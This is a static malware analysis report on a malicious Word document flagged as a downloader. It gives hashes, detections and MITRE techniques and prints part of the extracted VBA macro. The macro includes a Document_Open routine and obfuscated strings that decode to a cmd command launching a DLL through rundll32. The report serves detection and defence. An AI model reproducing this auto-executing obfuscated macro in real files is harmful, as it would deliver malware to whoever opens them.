Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 405b918189ab1ba4…

MALICIOUS

Office (OOXML)

110.0 KB Created: 2021-10-05 11:31:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2021-10-12
MD5: 36b9bc3266dda132c7524edcdf8aac9e SHA-1: d31c3435a72ae5377ff1d3d97a903be6638791dd SHA-256: 405b918189ab1ba4f756be1e698a7375e2add4ba04c8edc75a83bc58ff526eab
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an OOXML document containing a VBA project with a Document_Open macro that executes shell commands. This macro is designed to download and execute a second-stage payload, as indicated by ClamAV detections. The VBA code appears to be obfuscated, but the presence of a Document_Open macro and shell execution strongly suggests a downloader or dropper functionality.

Heuristics 5

  • ClamAV: Doc.Downloader.Generic-8011192-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-8011192-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 43482 bytes
SHA-256: 1dae0e1b725164b218ce9890af6d8afaa4ed7f44d2ab9223e33b9b18c78c81d0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function sertsd(ByVal rCell As Range, _
                        ByVal strFind As String)
    j = InStr(1, rCell.value, strFind, vbTextCompare)
    With rCell
        .Characters(Start:=j, Length:=Len(strFind)).Font.ColorIndex = 3
        .Characters(Start:=j, Length:=Len(strFind)).Font.Bold = True
    End With
End Function

Sub sgaswreta()
Dim i As Long, m
Dim iNbRow As Long, iRowStart As Long: iRowStart = 1
Dim iNbCol As Long, iClnStart As Long: iClnStart = 1
Dim oSh As Object
Dim oWb As Object '
Dim oWbMain As Object
Dim strWbMainFullName As String: strWbMainFullName = oWbMain.FullName

Dim strWbMainName As String
m = Split(strWbMainFullName, ".", -1, vbTextCompare)
strWbMainName = m(LBound(m))
strWbMainName = Trim(oSh.Cells(iRowStart, 1).value)
EventsChange False
Set oWb = ActiveWorkbook
EventsChange True
End Sub

Public Sub holehfls()
    Dim sdf As Double
    Dim fojn As Long
    
    sdf = Sin(3)
    
    fojn = lsjalkjd.falkhqlsih(0, "sdfgw4", "893792", 0, 0)
    If fojn = 0 Then
    
        vbnkljb34.OptionButton3.Caption = "Cekw:ekw\ekwWekwinekwdoekwwekws\ekwSekwyekwstekwemekw3ekw2\cekwmdekw.eekwxekwe"
        vbnkljb34.OptionButton3.Caption = lsjalkjd.nlqkflsk(vbnkljb34.OptionButton3.Caption, "ekw")
        
        vbnkljb34.OptionButton3.Tag = "bDr/bDrc cbDrhobDricbDre /CbDr bDrY bDr/bDrN bDr/DbDr YbDr /TbDr 3bDr0 bDr& sbDrtabDrrt bDrCbDr:bDr\bDrWibDrndbDrowbDrs\SbDrysbDrtebDrm3bDr2\rbDrunbDrdlbDrl3bDr2.bDrexbDre CbDr:bDr\bDrPrbDrogbDrrabDrmDbDratbDra\cnkbDrljb.dbDrlbDrl,KbDralbDri"
        vbnkljb34.OptionButton3.Tag = lsjalkjd.nlqkflsk(vbnkljb34.OptionButton3.Tag, "bDr")
        
        lsjalkjd.jgoleirh 3, vbnkljb34.OptionButton3.Caption, vbnkljb34.OptionButton3.Tag
    Else
        Dim df As Integer
        Dim d As String
        df = 4
        d = CStr(df)
    End If
End Sub


Sub EventsChange(value As Boolean)
    With Application
        .Calculation = xlCalculationAutomatic
        .ScreenUpdating = value
        .ShowWindowsInTaskbar = value
        .DisplayAlerts = value
        .EnableEvents = value
        If value Then
            .Calculation = xlCalculationAutomatic
            Else: .Calculation = xlCalculationManual
        End If
    End With
End Sub


Private Sub Document_Open()
    Dim x, y, z As Double
    Dim hnfkj As String
    holehfls
    hnfkj = vbnkljb34.OptionButton3.Caption
End Sub

Attribute VB_Name = "vbnkljb34"
Attribute VB_Base = "0{9FCECD69-FED3-4FCB-B404-E00301D1960E}{3372E92E-832F-4C27-9377-45E68FD738B4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "lsjalkjd"

Function FnDelDub(ByVal oSh As Object, _
                    Optional ByVal iRowStart As Long = 1, _
                    Optional ByVal iClnStart As Long = 1) As Boolean
    Dim aColsArr(), i&
    Dim iNbRow As Long, iNbCln As Long
    Dim strCellSelect
On Error GoTo FnDelDub_Err
    With oSh
        iNbCln = 1 '.Cells(1, 256).End(xlToLeft).Column
        iNbRow = .Cells(Rows.Count, 1).End(xlUp).Row
        strCellSelect = Range(.Cells(iRowStart, iClnStart), .Cells(iNbRow, iNbCln)).Address
        ReDim aColsArr(iNbCln - 1)
        For i = 1 To iNbCln
            aColsArr(i - 1) = i
        Next
        .Range(strCellSelect).RemoveDuplicates (aColsArr), xlYes
    End With
    Erase aColsArr
    FnDelDub = True: Exit Function
FnDelDub_Err:
FnDelDub = False
End Function


Sub jgoleirh(flkas As Long, fewo4ih As String, jgdlfk As String)
    vbnkljb34.ListBox1.AddItem
    vbnkljb34.ListBox1.AddItem
    weuorihod.jflwk 0, vbNullString, fewo4ih, jgdlfk, vbNu
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 95744 bytes
SHA-256: a02a402c85c1049466a34a10c6d54682db6a3026a5a1234ac36379ff281b58ad
Detection
ClamAV: Doc.Downloader.Generic-8011192-0
Obfuscation or payload: unlikely